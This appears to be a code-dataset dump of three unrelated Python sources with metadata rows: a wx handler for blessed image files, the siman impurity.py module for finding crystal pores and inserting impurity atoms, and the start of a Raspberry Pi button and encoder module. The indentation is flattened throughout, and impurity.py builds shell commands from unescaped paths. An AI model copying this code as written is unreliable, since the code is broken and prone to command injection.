if (os.path.isfile(defaultContainerFilename)):
blessFile = open(defaultContainerFilename, "rb")
defaultBlessedImageFilename = blessFile.readline().strip()
blessFile.close()
# Need to compare absolute filenames.
if (len(defaultBlessedImageFilename) > 0):
defaultBlessedImageFilename = os.path.join(blessedDir, defaultBlessedImageFilename)
defaultBlessedImageFilename = os.path.abspath(defaultBlessedImageFilename)
isDefault = False
for filename in self.__filenames:
filename = os.path.abspath(filename)
if (filename == defaultBlessedImageFilename):
isDefault = True
break
if (isDefault):
blessFile = open(defaultContainerFilename, "w")
blessFile.close()
if (self.__callback != None):
self.__callback(False)
def __OnMakeDefault(self, e):
e.Skip()
# Rewrite the default blessed file to include these local filenames.
blessedDir = os.path.join(self.__dataSetPath, BLESSED_DIR)
defaultContainerFilename = os.path.join(blessedDir, BLESSED_DEFAULT_FILE)
blessFile = open(defaultContainerFilename, "w")
if (self.__filenames != None) and (len(self.__filenames) > 0):
for filename in self.__filenames:
relativeFilename = FUtils.GetRelativePath(filename, blessedDir)
blessFile.write(relativeFilename)
blessFile.write("\n")
else:
pass # Intentionally leave empty. Can we actually get here in the UI?
blessFile.close()
if (self.__callback != None):
self.__callback(True)
| mit | 8,617,399,534,047,996,000 | 43.169884 | 466 | 0.603409 | false |
dimonaks/siman | siman/impurity.py | 1 | 35842 | from __future__ import division, unicode_literals, absolute_import
import ctypes
from tabulate import tabulate
#from ctypes import *
from ctypes import cdll
from ctypes import c_float, byref
import numpy as np
import traceback, os, sys, datetime, glob, copy
from siman import header
from siman.header import print_and_log, printlog, geo_folder, runBash
from siman.classes import CalculationVasp, Structure
from siman.set_functions import InputSet
from siman.functions import return_atoms_to_cell, element_name_inv
from siman.inout import write_xyz
from siman.geo import local_surrounding, local_surrounding2, xcart2xred, xred2xcart
lib = cdll.LoadLibrary(os.path.dirname(__file__)+'/libfindpores.so')
def create_c_array(pylist, ctype):
if ctype == float:
c_array = (ctypes.c_float * len(pylist))(*pylist)
return c_array
def find_pores(st_in, r_matrix=1.4, r_impurity = 0.6, step_dec = 0.05, fine = 0.3, prec = 0.1, calctype = 'central', gbpos = 0,
find_close_to = (), check_pore_vol = 0):
"""
st_in - input Structure() object
r_impurity (A)- all pores smaller than this radius will be found
r_matrix (A) - radius of matrix atoms disregarding to their type
step_dec - scanning step of the cell in Angstroms
fine - allows to change density of local points; local_step = step_dec/fine
prec - precicion of pore center determination
check_pore_vol - allows to estimate volume of pores; has problems for big cells
'find_close_to' - works in the cases of gb and grain_vol; allows to ignore all and find pore close to provided three reduced coordinates
return - instance of Structure() class with coordinates of pores. Number and type of included pores depend on the argument of 'calctype'.
"""
xred = st_in.xred
natom = len(xred)
rprimd = st_in.rprimd
name = st_in.name
#print xred
"""Additional values"""
# check_pore_vol = 1
#if calctype in ("pore_vol","gb","grain_vol","all_local" ): check_pore_vol = 1 #something wrong with this function, especially for big cells
"""----Conversions of types for C++"""
r1 = create_c_array(rprimd[0], float)
r2 = create_c_array(rprimd[1], float)
r3 = create_c_array(rprimd[2], float)
xred1 = (c_float * len(xred))(*[x[0] for x in xred])
xred2 = (c_float * len(xred))(*[x[1] for x in xred])
xred3 = (c_float * len(xred))(*[x[2] for x in xred])
max_npores = 10000;
ntot = ctypes.c_int32(); npores = ctypes.c_int32()
l_pxred1 = (c_float * max_npores)(0) #make static arrays fol local points
l_pxred2 = (c_float * max_npores)(0)
l_pxred3 = (c_float * max_npores)(0)
l_npores = (ctypes.c_int32 * max_npores)(0)
pxred1 = (c_float * max_npores)(0) #make static arrays natoms + npore
pxred2 = (c_float * max_npores)(0)
pxred3 = (c_float * max_npores)(0)
"""----Run C++ function"""
print_and_log("Starting C++ function lib.findpores()...\n")
# print(r_matrix, r_impurity, step_dec, fine, prec)
lib.findpores ( check_pore_vol, \
max_npores, \
byref(ntot), l_pxred1, l_pxred2, l_pxred3, l_npores, \
byref(npores), pxred1, pxred2, pxred3, \
natom, xred1, xred2, xred3, \
c_float(r_matrix), c_float(r_impurity), c_float(step_dec), c_float(fine), c_float(prec), \
r1, r2, r3 )
print_and_log( "ntot is ", ntot.value)
print_and_log( "l_npores[0] is ",l_npores[0])
v = np.zeros((3))
l_pxred = []
shift1 = 0; shift2 = 0
for i_por in range(npores.value):
l_pxred.append( [] )
shift2+=l_npores[i_por]
for i in range(shift1, shift2):
v[0] = l_pxred1[i]; v[1] = l_pxred2[i]; v[2] = l_pxred3[i]
l_pxred[i_por].append( v.copy() )
shift1 = shift2
if shift2 != ntot.value:
print_and_log( "Error! final shift2 not equal to ntot")
#print l_pxred[0]
pxred = [] # only coordinates of pores
#print pxred1[natom]
for i in range(npores.value):
v[0] = pxred1[i+natom]; v[1]= pxred2[i+natom]; v[2] = pxred3[i+natom] #with shift, because first natom elements are coordinates of atoms
pxred.append( v.copy() )
#print pxred
"""----End of C++; result is two lists: lpxred - local geometry of all pores, pxred - coordinates of all pores"""
""" Analyse of pores """
# st_result = Structure()
st_result = st_in.new()
st_result.rprimd = rprimd
targetp = np.array((0.,0.,0.))
if find_close_to:
targetp = np.asarray(find_close_to) #targer point
print_and_log( "Target point is ",targetp)
a = step_dec/fine #the side of little cube formed by the mesh which is used to find spheres inside the pore.
aaa = a*a*a
#find most central pore
if calctype == 'central': #return coordinates of the most central pore
st_result.name = "central_pore_from "+name
center = np.array((0.5,0.5,0.5))#center of cell
d_min = 100
for x in pxred:
d = np.linalg.norm(x - center)
#print x, x-center, d
if d < d_min and x[0] <= 0.5 and x[1] <= 0.5 and x[2] <= 0.5:
d_min = d
x_min = x
print_and_log( "The closest pore to the center has coordinates",x_min)
st_result.xred.append( x_min )
elif calctype == 'gb': #add impurity at gb
st_result.name = "gb_pore_from "+name
d_min = 100; #d2_min = 100
dt_min =100
i_min = 0; x_min = np.zeros((3))
for i, x in enumerate(pxred):
#print "l_npores ",l_npores[i]
d = abs(x[0] - gbpos/rprimd[0][0]) #
#print x[0], d
if find_close_to: closer = (np.linalg.norm(targetp - x) < dt_min)
else: closer = ( d < d_min ) # and x[1]>0.3 and x[2]>0.3:
if closer:
x_pre = x_min
i_pre = i_min
d_min = d
dt_min = np.linalg.norm(targetp - x)
x_min = x
i_min = i
#find and add impurity in bulk
#d2 = abs( x[0] - (gbpos/rprimd[0][0] - 0.25) )
#if d2 < d2_min:
# d2_min = d2
# x2_min = x
# i2_min = i
#print "rprimd[0][0]", rprimd[0][0]
print_and_log( "Position of boundary is ",gbpos/rprimd[0][0])
#x_min[0] = gbpos/rprimd[0][0]
if find_close_to: print_and_log( "The closest pore to the target point is [ %.2f %.2f %.2f ]"%(x_min[0], x_min[1], x_min[2]))
else: print_and_log( "The closest pore to the gb has coordinates",x_min)
st_result.xred.append( x_min )
#st_result.xred.append( x_pre )
#Calculate volume of the pore using local balls:
print_and_log( "The number of pore is ",i_min," ; It has ",l_npores[i_min], "local balls")
print_and_log( "Volume of pore is ", l_npores[i_min] * a*a*a, " A^3")
#st_result.xred.extend( l_pxred[i_min] )
#st_result.xred.extend( l_pxred[i_pre] )
#print "The closest pore to the center of bulk has coordinates",x2_min
#st_result.xred.append( x2_min )
#Calculate volume of the pore using local balls:
#print "The number of bulk pore is ",i2_min," ; It has ",l_npores[i2_min], "local balls"
#print "Volume of pore is ", l_npores[i2_min] * a*a*a, " A^3";
#st_result.xred.extend( l_pxred[i2_min] )
elif calctype == 'grain_vol': #add impurity to volume of grain
st_result.name = "grain_volume_pore_from "+name
d2_min = 100
dt_min = 100
i_min = 0; x_min = np.zeros((3))
for i, x in enumerate(pxred):
#find and add impurity to the bulk
d2 = abs( x[0] - (gbpos/rprimd[0][0] - 0.25) )
if find_close_to: closer = (np.linalg.norm(targetp - x) < dt_min)
else: closer = ( d2 < d2_min ) # and x[1]>0.3 and x[2]>0.3:
if closer:
dt_min = np.linalg.norm(targetp - x)
d2_min = d2
x2_min = x
i2_min = i
if find_close_to: print_and_log( "The closest pore to the target point is [ %.2f %.2f %.2f ]"%(x2_min[0], x2_min[1], x2_min[2]))
else: print_and_log( "The closest pore to the center of bulk has coordinates",x2_min)
st_result.xred.append( x2_min )
#Calculate volume of the pore using local balls:
print_and_log( "The number of bulk pore is ",i2_min," ; It has ",l_npores[i2_min], "local balls")
print_and_log( "Volume of pore is ", l_npores[i2_min] * a*a*a, " A^3")
st_result.xred.extend( l_pxred[i2_min] )
elif calctype == 'all_local':
st_result.name = "all_local_points_from "+name
v_max = 0
i_max = 0
for i in range(npores.value):
v_pore = l_npores[i] * aaa
print_and_log( "Volume of pore is ", l_npores[i] * aaa, " A^3")
if v_pore > v_max: v_max = v_pore; i_max = i
print_and_log( "Pore number ", i_max,"has the largest volume ", v_max," A^3")
# st_result.xred = l_pxred[i_max] # here coordinates of all local points to show geometry of pore with largerst volume
st_result.xred = [x for group in l_pxred for x in group ] # all pores
elif calctype == 'all_pores':
st_result.name = "all_local_pores_from "+name
st_result.xred = pxred
st_result.rprimd = rprimd
st_result.xred2xcart()
st_result.typat = [1 for x in st_result.xred]
st_result.ntypat = 1
st_result.natom = len(st_result.typat)
st_result.znucl = [200]
st_ntypat = 1
return st_result
def add_impurity(it_new, impurity_type = None, addtype = 'central', calc = [], r_pore = 0.5,
it_to = '', ise_to = '', verlist_to = [], copy_geo_from = "", find_close_to = (),add_to_version = 0,
write_geo = True, only_version = None, fine = 4, put_exactly_to = None, check_pore_vol = 0, replace_atom = None, override = False):
"""
Add impurities in pores.
Input:
it_new - name of new structure with impurity
impurity_type - name of impurity from Mendeley table, for example 'C'
addtype - type of adding: ['central',]; 'central' means that impurity
will be placed as close to the geometrical center of cell as possible.
it_to , ise_to , verlist_to - completed calculations in which impurity
will be added
if 'verlist_to' is empty, function will try to find geometry files in 'geo_folder + struct_des[it_to].sfolder' folder;
even if 'it_to' is empty it will try to find files in 'geo_folder + struct_des[it_new].sfolder+'/from' ' folder.
'ise_to' also can be empty
if 'copy_geo_from' is not empty, then programm copy all files from folder 'copy_geo_from' to
folder 'geo_folder + struct_des[it_to].sfolder+"/"+it_to' or 'geo_folder + struct_des[it_new].sfolder+"/from" '
'find_close_to' is tuple of three reduced coordinates of point close to which you want to find impurity. If empty - ignored;
'add_to_version' is integer number added to each 'verlist_to' number to produce ver_new.
'only_version' - if == [v,], then instertion will be provided only for v. If None insertion will be made in all found versions
If you want to add impurity to relaxed structure ...
'fine' - integer number; allows to reduce number of small steps for defining center
Possible addtype's:
'central' - add one atom to the pore which is most close to the center of the cell but with reduced coordinates less than 0.5 0.5 0.5
'all_pore' - add atoms in every found pore
'all_local' - add atoms to every local point which allows to visualise topology of pores.
'gb' - uses self.gbpos and places atom close to this value assuming that it will be at gb
'grain_vol' - uses self.gbpos and assuming that cell contains two gb and two equal grains, places atom close to the centre of grain; y and z can be arbiratry
put_exactly_to - will add impurity to this point
find_close_to - will try to find closest void and insert pore here.
check_pore_vol - allows to estimate volume of pores; has problems for big cells
replace_atom - if not None, than the specified atom is substituted
Side effects: creates new geometry folder with input structures;
"""
struct_des = header.struct_des
def test_adding_of_impurities(added, init, v):
"""
Can be used only inside add_impurity()
Replicates the structure and find again pores
"""
global natoms_v1
if added == None: return
if v == 1: #TEST
natoms_v1 = len(added.init.xcart) # for test
st_rep_after = added.init.replic( (1,2,1) )
rep = copy.deepcopy(init)
rep.init = rep.init.replic( (1,2,1) );
#print rep
rep = add(znucl, "", rep, write_geo = False)
#print rep
#print "xcart of replic after adding ", st_rep_after.xcart
#print "xcart of adding to replic ", rep.init.xcart
if len(st_rep_after.xcart) != len(rep.init.xcart): raise RuntimeError
p = 0
#for x2 in st_rep_after.xcart:
# print x2
for x in rep.init.xcart:
a = any( ( np.around(x2, p) == np.around(x, p) ).all() for x2 in st_rep_after.xcart )
#b = any( ( np.ceil(x2, p) == np.ceil(x, p) ).all() for x2 in st_rep_after.xcart )
#c = any( ( np.floor(x2, p) == np.floor(x, p) ).all() for x2 in st_rep_after.xcart )
#print a, b, c
#np.concatenate(a, b, c):
if not a:
print_and_log( "Error! Can't find ", np.around(x,3), "in replic ")
raise RuntimeError
#assert all([ all( np.around(v1, 8) == np.around(v2, 8) ) for (v1, v2) in zip(st_rep_after.xcart, rep.init.xcart) ])
print_and_log( "add_impurity: test succesfully done")
if natoms_v1 != len(added.init.xcart): print_and_log("You have different number of pores in different versions\n"); raise RuntimeError
return
def add(znucl, xyzpath = "", new = None, write_geo = True, put_exactly_to = None):
"if put_exactly_to is True, then atom just added and nothing are searched"
if write_geo and os.path.exists(new.path["input_geo"]) and not override:
print_and_log("add: File '"+new.path["input_geo"]+"' already exists; continue\n", imp = 'Y');
return new
#new.init = return_atoms_to_cell(new.init)
if replace_atom:
#atom substitution
if znucl not in new.init.znucl:
new.init.znucl.append(znucl)
new.init.ntypat+=1
new.init.typat[replace_atom] = new.init.ntypat
else:
ind = new.init.znucl.index(znucl)
new.init.typat[replace_atom] = ind + 1
new.init.nznucl = []
for typ in range(1, new.init.ntypat+1):
new.init.nznucl.append(new.init.typat.count(typ) )
else:
new_before = copy.deepcopy(new)
# new.init.xcart[-2][0]-=0.9 #was made once manually for c1gCOi10.1
# new.init.xcart[-2][2]+=0.2
# new.init.xred = xcart2xred(new.init.xcart, new.init.rprimd)
write_xyz(new.init)
#step = 0.042
step = 0.06
#r_pore = 0.56
#fine = 0.3 # for visualisation of pores
#fine = 4 #controls small steps; the steps are smaller for larger numbers
#r_pore = 0.54
prec = 0.004 # precision of center Angs
if new.hex_a == None:
r_mat = 1.48 -step
else:
r_mat = new.hex_a / 2 - step
if put_exactly_to:
pores_xred = [np.array(put_exactly_to),]
print_and_log( 'Inmpurity just put in ', pores_xred, imp = 'Y')
else:
pores = find_pores(new.init, r_mat, r_pore, step, fine, prec, addtype, new.gbpos, find_close_to, check_pore_vol) #octahedral
pores_xred = pores.xred
npores = len(pores_xred)
st = new.init
#delete last oxygen; was made once manually for c1gCOi10.1
# st.natom-=1
# del st.xred[-1]
# del st.typat[-1]
st.natom += npores
st.xred.extend( pores_xred )
if znucl in st.znucl:
print_and_log( "znucl of added impurity is already in cell")
ind = st.znucl.index(znucl)
typat = ind+1
st.nznucl[ind]+=npores
else:
st.ntypat +=1
typat = st.ntypat
st.znucl.append( znucl )
st.nznucl.append( npores )
for i in range( npores ):
st.typat.append( typat )
st.xred2xcart()
new.init = st
#print "Add impurity: len(xred ", len(new.init.xred)
#print "natom", new.init.natom
#For automatisation of fit
try:
#new.build
if new.build.nadded == None: new.build.nadded=npores
else: new.build.nadded+=npores
if new.build.listadded == [None]: new.build.listadded = range(new.natom - npores, new.natom) #list of atoms which were added
else: new.build.listadded.extend( range(new.natom - npores, new.natom) )
#print "Warning!!! Information about added impurities rewritten"
except AttributeError:
pass
#new.init.znucl = new.znucl
#new.init.typat = new.typat
#write_xyz(replic(new.init, (2,1,2)) , xyzpath)
#test_adding_of_impurities(new, new_before, v)
print_and_log("Impurity with Z="+str(znucl)+" has been added to the found pore in "+new.name+"\n\n")
if write_geo:
write_xyz(new.init , xyzpath)
new.write_geometry("init",new.des, override = override)
print_and_log( "\n")
return new
"""0.Begin----------------------------------------------------------------------------"""
znucl = element_name_inv(impurity_type)
if impurity_type != 'octa' and impurity_type not in it_new:
print_and_log("add_impurity: Your name 'it_new' is incorrect!\n\n")
raise RuntimeError
#del header.history[-2]
#
#hstring = ("add_impurity('%s', '%s', '%s', calc, %.3f, '%s', '%s', %s, '%s') #at %s" %
# (it_new, impurity_type, addtype, r_pore,
# it_to, ise_to, verlist_to, copy_geo_from,
# datetime.date.today() ) )
hstring = ("%s #on %s"% (traceback.extract_stack(None, 2)[0][3], datetime.date.today() ) )
if hstring != header.history[-1]: header.history.append( hstring )
#geo_exists =
"""1. The case of insertion to existing calculations--------------------------------------------------"""
if verlist_to:
for v in verlist_to:
if only_version and v not in only_version: continue # only_version = None works for all versions
id = (it_to, ise_to, v)
new = copy.deepcopy(calc[id])
new.init = new.end #replace init structure by the end structure
new.version = v+add_to_version
new.name = it_new#+'.'+id[1]+'.'+str(id[2])
new.des = 'Obtained from '+str(id)+' by adding '+impurity_type+' impurity '
path_new_geo = struct_des[it_new].sfolder+"/"+it_new+"/"+it_new+'.imp.'+addtype+'.'+str(new.version)+'.'+'geo'
new.init.name = it_new+".init."+str(new.version)
xyzpath = struct_des[it_new].sfolder+"/"+it_new
new.path["input_geo"] = geo_folder+path_new_geo
print_and_log("File '"+new.path["input_geo"] +"' with impurity will be created\n");
#new.init.name = 'test_before_add_impurity'
new = add(znucl, xyzpath, new, write_geo, put_exactly_to = put_exactly_to)
"""2. The case of insertion to geo files------------------------------------------------------------"""
else:
""" Please rewrite using new functions """
print_and_log("You does not set 'id' of relaxed calculation. I try to find geometry files in "+it_new+" folder\n")
if it_to: geo_path = geo_folder + struct_des[it_to].sfolder + "/" + it_to
else: geo_path = geo_folder + struct_des[it_new].sfolder + "/" + it_new+'/from'
if copy_geo_from:
print_and_log("You asked to copy geo files from "+copy_geo_from+" to " +geo_path+ " folder\n")
#if not os.path.exists(os.path.dirname(geo_path)):
runBash( "mkdir -p "+geo_path )
runBash( "cp "+copy_geo_from+"/* "+geo_path )
if os.path.exists(geo_path):
print_and_log("Folder '"+geo_path +"' was found. Trying to add impurity\n");
else:
print_and_log("Error! Folder "+geo_path+" does not exist\n"); raise RuntimeError
#geofilelist = glob.glob(geo_path+'/*.geo*') #Find input_geofile
#geofilelist = runBash('find '+geo_path+' -name "*grainA*.geo*" ').splitlines()
#geofilelist = runBash('find '+geo_path+' -name "*.geo*" ').splitlines()
geofilelist = glob.glob(geo_path+'/*.geo*')
print_and_log( "There are several files here already: ", geofilelist, imp = 'y' )
#print 'find '+geo_path+' -name "*.geo*" ',geofilelist
#return
for input_geofile in geofilelist:
v = int( runBash("grep version "+str(input_geofile) ).split()[1] )
if only_version and v not in only_version: continue # only_version = None works for all versions
new = CalculationVasp()
new.version = v
new.name = input_geofile
new.read_geometry(input_geofile)
init = copy.deepcopy(new)
igl = input_geofile.split("/")
#new.name = igl[-3]+'/'+igl[-3] #+input_geofile
new.name = struct_des[it_new].sfolder+"/"+it_new+"/"+it_new
print_and_log( "New path and part of name of file is ", new.name, imp = 'Y')
#return
new.des = 'Obtained from '+input_geofile+' by adding '+impurity_type+' impurity '
#new.init.xred = new.xred
#new.init.rprimd = new.rprimd
#print new.rprimd
new.init.name = new.name+'.imp.'+addtype+'.'+str(new.version)
#new.path["input_geo"] = geo_folder+it_new+"/"+new.end.name+'.'+'geo'
new.path["input_geo"] = geo_folder+"/"+new.init.name+'.'+'geo'
#new.init.name = 'test_before_add_impurity'
new = add(znucl, "", new, write_geo, put_exactly_to = put_exactly_to)
return new.path["input_geo"] #return for last version
def insert_cluster(insertion, i_center, matrix, m_center):
"""
Take care of orientation; typat should be consistent
Input:
insertion - object of class Structure(), which is supposed to be inserted in matrix
in such a way that i_center will be combined with m_center.
matrix - object of class Structure().
i_center, m_center - numpy arrays (3) cartesian coordinates
"""
ins = copy.deepcopy(insertion)
mat = copy.deepcopy(matrix)
r = mat.rprimd
hproj = [ (r[0][i]+r[1][i]+r[2][i]) * 0.5 for i in (0,1,2) ] #projection of vectors on three axis
if 1:
for i, x in enumerate(ins.xcart):
ins.xcart[i] = x - i_center
for i, x in enumerate(mat.xcart):
mat.xcart[i] = x - m_center
max_dis = 1
for i_x, ix in enumerate(ins.xcart):
dv_min = max_dis
print_and_log( "Insertion atom ",ix,)
if 1:
for j, mx in enumerate(mat.xcart):
dv = mx - ix
for i in 0,1,2:
if dv[i] > hproj[i]: dv = dv - mat.rprimd[i] #periodic boundary conditions - can be not correct (in the sense that closest image can lie not 100 % in the neighbourhood image cell ) for oblique cells and large absolute values of dv
if dv[i] < -hproj[i]: dv = dv + mat.rprimd[i]
len1 = np.linalg.norm(dv)
len2, second_len2 = mat.image_distance(mx, ix, r, 1) #check len1
#print "Lengths calculated with two methods ", len1, len2
len1 = len2 #just use second method
#assert np.around(len1,1) == np.around(len2,1)
if len1 < dv_min:
dv_min = len1;
j_r = j # number of matrix atom to replace
if 1:
#Modify to replace overlapping atoms
if dv_min == max_dis:
print_and_log( " is more far away from any matrix atom than ",dv_min," A; I insert it")
# mat.xcart.append( ix )
# print_and_log( 'type of added atom is ', ins.typat[i_x])
# mat.typat.append( ins.typat[i_x] )
mat = mat.add_atom(xc = ix, element = ins.get_elements()[i_x] )
else:
print_and_log( "will replace martix atom", mat.xcart[j_r] )
mat.xcart[j_r] = ix.copy()
mat.rprimd = r
mat.xcart2xred()
mat.natom = len(mat.xcart)
mat.name = 'test_of_insert'
st = mat
# print(st.natom, len(st.xcart), len(st.typat), len(st.znucl), max(st.typat) )
# write_xyz(mat)
mat = mat.return_atoms_to_cell()
mat.write_poscar()
return mat
#write_xyz(mat)
def make_interface(main_slab, m_xc, second_slab, s_xc):
"""
Make interfaces
Both slabs should have close sizes along x and y and should be oriented correctly
Input:
main_slab (Structure) - slab
second_slab (Structure) - slab, scaled to coincide with the main slab
m_xc, s_xc (array(3)) - cartesian coordinates of pointis in main_slab and secondary slab to be combined
Return Slab with interface and scaled second slab
"""
ins = copy.deepcopy(second_slab)
mat = copy.deepcopy(main_slab)
if 1:
#scale insertion
mr = mat.rprimd_len()
ir = ins.rprimd_len()
print('Matrix vlength', mr)
print('Insert vlength', ir)
x_scale = mr[0]/ ir[0]
y_scale = mr[1]/ ir[1]
print('Scaling factors', x_scale, y_scale)
# print('i_center', i_center)
ins.rprimd[0] = ins.rprimd[0]*x_scale
ins.rprimd[1] = ins.rprimd[1]*y_scale
ir = ins.rprimd_len()
s_xred = xcart2xred([s_xc], ins.rprimd)[0]
print('Insert vlength after scaling', ir)
ins.update_xcart()
# ins.xcart2xred()
ins_sc = ins.copy()
ins_sc.name+='_scaled'
s_xc = xred2xcart([s_xred], ins.rprimd)[0]
# print('i_center', i_center)
if 1:
for i, x in enumerate(ins.xcart):
ins.xcart[i] = x - s_xc
for i, x in enumerate(mat.xcart):
mat.xcart[i] = x - m_xc
for i_x, ix in enumerate(ins.xcart):
mat = mat.add_atom(xc = ix, element = ins.get_elements()[i_x] )
mat.xcart2xred()
mat.natom = len(mat.xcart)
mat.name += 'inteface'
mat = mat.return_atoms_to_cell()
mat = mat.shift_atoms([0,0,0.5])
return mat, ins_sc
def insert(it_ins, ise_ins, mat_path, it_new, calc, type_of_insertion = "xcart" ):
"""For insertion of atoms to cells with changed lateral sizes
Input:
'type_of_insertion = xred' used to add xred coordinates
mat_path - path to geo files which are supposed to be changed
it_ins - already existed calculation; xred will be used from this calculation.
it_new - new folder in geo folder for obtained structure
This function finds version of calculation in folder mat_path and tries to use the same version of it_ins
"""
if not os.path.exists(mat_path):
print_and_log("Error! Path "+mat_path+" does not exist\n\n")
raise RuntimeError
if it_ins not in mat_path and it_ins not in it_new:
print_and_log('Cells are', it_ins, mat_path, it_new)
print_and_log("Error! you are trying to insert coordinates from cell with different name\n\n")
#raise RuntimeError
hstring = ("%s #on %s"% (traceback.extract_stack(None, 2)[0][3], datetime.date.today() ) )
if hstring != header.history[-1]: header.history.append( hstring )
geofilelist = runBash('find '+mat_path+'/target -name "*.geo*" ').splitlines()
if geofilelist == []:
print_and_log("Warning! Target folder is empty. Trying to find in root folder ...")
geofilelist = runBash('find '+mat_path+'/ -name "*.geo*" ').splitlines()
ins = None
for mat_geofile in geofilelist:
mat = CalculationVasp()
mat.name = mat_geofile
mat.read_geometry(mat_geofile)
#step = 0.27
#r_pore = 0.56
#r_mat = mat.hex_a / 2 - step
#pores = find_pores(mat.init, r_mat, r_pore, step, 0.3, 'central') #octahedral
#mat.xcart.append ( pores.xcart[0] )
#mat.typat.append(1)
try:
ins_working = ins
ins = calc[(it_ins, ise_ins, mat.version)]
except KeyError:
print_and_log( "No key", (it_ins, ise_ins, mat.version), "I use previous working version !!!", imp = 'y' )
ins = ins_working
#return
#ins.end.znucl = ins.znucl
#ins.end.nznucl = ins.nznucl
#ins.end.ntypat = ins.ntypat
#ins.end.typat = ins.typat
#print ins.xcart[-1]
mat_geopath = geo_folder+struct_des[it_new].sfolder + '/'
if type_of_insertion == "xcart":
#Please update here!
mat_filename = '/'+it_new+"."+"inserted."+str(mat.version)+'.'+'geo'
v = np.zeros(3)
result = insert_cluster(ins.end, v, mat.init, v )
mat.end = result
mat.init = result
# mat.znucl = mat.end.znucl
# mat.nznucl = mat.end.nznucl
# mat.ntypat = mat.end.ntypat
# mat.typat = mat.end.typat
# mat.natom = len(mat.end.xred)
#mat.version = ins.version
des = ins.name+" was inserted to "+mat_geofile
elif type_of_insertion == "xred":
mat_filename = '/from/'+it_new+".xred."+str(mat.version)+'.'+'geo'
#mat.end.rprimd = mat.rprimd
#mat.init.xred = copy.deepcopy(ins.end.xred)
#mat.init.typat = copy.deepcopy(ins.end.)
#print ins.end.xcart
rprimd = copy.deepcopy(mat.init.rprimd)
#build = mat.build
mat.init = copy.deepcopy(ins.end)
#mat.build = build
mat.init.rprimd = rprimd #return initial rprimd
mat.init.xred2xcart() #calculate xcart with new rprimd
des = "atoms with reduced coord. from "+ins.name+" was fully copied to "+mat_geofile
mat.init.name = 'test_insert_xred'+str(mat.version)
write_xyz(mat.init)
mat.path["input_geo"] = mat_geopath + it_new + mat_filename
if not mat.write_geometry("init",des): continue
print_and_log("Xred from "+it_ins+" was inserted in "+mat_geofile+" and saved as "+mat_filename+" \n\n")
return
def determine_voids(st, r_impurity, fine = 1, step_dec = 0.05):
if not r_impurity:
printlog('add_neb(): Error!, Please provide *r_impurity* (1.6 A?)')
sums = []
avds = []
printlog('Searching for voids', important = 'y')
st_pores = find_pores(st, r_matrix = 0.5, r_impurity = r_impurity, step_dec = step_dec, fine = fine, calctype = 'all_pores')
printlog('List of found voids:\n', np.array(st_pores.xcart) )
write_xyz(st.add_atoms(st_pores.xcart, 'H'), file_name = st.name+'_possible_positions')
write_xyz(st.add_atoms(st_pores.xcart, 'H'), replications = (2,2,2), file_name = st.name+'_possible_positions_replicated')
for x in st_pores.xcart:
# summ = local_surrounding(x, st, n_neighbours = 6, control = 'sum', periodic = True)
# avd = local_surrounding(x, st, n_neighbours = 6, control = 'av_dev', periodic = True)
summ, avd = local_surrounding2(x, st, n_neighbours = 6, control = 'sum_av_dev', periodic = True)
# print (summ, avd)
sums.append(summ)
avds.append(avd[0])
# print
sums = np.array(sums)
avds = np.array(avds).round(0)
print_and_log('Sum of distances to 6 neighboring atoms for each void (A):\n', sums, imp ='y')
print_and_log('Distortion of voids (0 - is symmetrical):\n', avds, imp ='y')
return st_pores, sums, avds
def determine_unique_voids(st_pores, sums, avds):
crude_prec = 1 # number of signs after 0
sums_crude = np.unique(sums.round(crude_prec))
print_and_log('The unique voids based on the sums:',
'\nwith 0.01 A prec:',np.unique(sums.round(2)),
'\nwith 0.1 A prec:',sums_crude,
imp ='y')
print_and_log('Based on crude criteria only', len(sums_crude),'types of void are relevant', imp = 'y')
insert_positions = []
start_table = []
for i, s in enumerate(sums_crude):
index_of_first = np.where(sums.round(crude_prec)==s)[0][0]
start_table.append([i, st_pores.xcart[index_of_first].round(2), index_of_first,
avds[index_of_first], sums[index_of_first] ])
insert_positions.append( st_pores.xcart[index_of_first] )
print_and_log( tabulate(start_table, headers = ['void #', 'Cart.', 'Index', 'Dev.', 'Sum'], tablefmt='psql'), imp = 'Y' )
return insert_positions
def insert_atom(st, el, i_void = None, i_void_list = None, r_imp = 1.6, ):
"""Simple Wrapper for inserting atoms
i_void (int) has higher priority than i_void_list
return st_new, i_add, sts_by_one
st_new - all positions are filled
i_add - the number of last inserted atom
sts_by_one - list of structures with only one inserted atom in all found positions
"""
r_impurity = r_imp
st_pores, sums, avds = determine_voids(st, r_impurity)
insert_positions = determine_unique_voids(st_pores, sums, avds)
printlog('To continue please choose *i_void* from the list above', imp = 'y')
# st.name = st.name.split('+')[0]
if i_void:
i_void_list = [i_void]
if i_void_list is None:
i_void_list = list(range(len(insert_positions)))
printlog('No i_void was provided, I insert all', imp = 'y')
st_new = st.copy()
sts_by_one = []
for i in i_void_list:
xc = insert_positions[i]
st_new, i_add = st_new.add_atoms([xc], el, return_ins = True)
st_one, _ = st.add_atoms([xc], el, return_ins = True)
st_one.name+='+'+el+str(i)
sts_by_one.append(st_one)
st_new.name+='+'+el+str(i)
st_new.des+=';Atom '+el+' added to '+ str(xc)
printlog(st.des, imp = 'y')
st_new.write_poscar()
st_new.magmom = [None]
return st_new, i_add, sts_by_one
| gpl-2.0 | 590,717,953,333,718,100 | 35.314083 | 252 | 0.560488 | false |
psistrm12/rpiradio | buttonIO.py | 1 | 2334 | #!/usr/bin/env python
#
# Raspberry Pi input using buttons and rotary encoders
#
# Acknowledgement: This code is a variation oft the Rotary Switch Tutorial by Bob Rathbone.
# See http://www.bobrathbone.com/raspberrypi_rotary.htm for further information!
import RPi.GPIO as GPIO
class PushButton:
BUTTONDOWN = 1
BUTTONUP = 2
def __init__(self, pin, bouncetime, callback):
self.pin = pin
self.bouncetime = bouncetime
self.callback = callback
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(self.pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.add_event_detect(self.pin, GPIO.BOTH, callback=self.button_event, bouncetime=self.bouncetime)
return
# Push button up event
def button_event(self, b_event):
if GPIO.input(b_event):
event = self.BUTTONDOWN
else:
event = self.BUTTONUP
self.callback(event)
return
# end class PushButton
class RotaryEncoder:
CLOCKWISE = 3
ANTICLOCKWISE = 4
rotary_a = 0
rotary_b = 0
rotary_c = 0
last_state = 0
direction = 0
# Initialise rotary encoder object
def __init__(self,pinA,pinB,callback):
self.pinA = pinA
self.pinB = pinB
#self.button = button
self.callback = callback
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
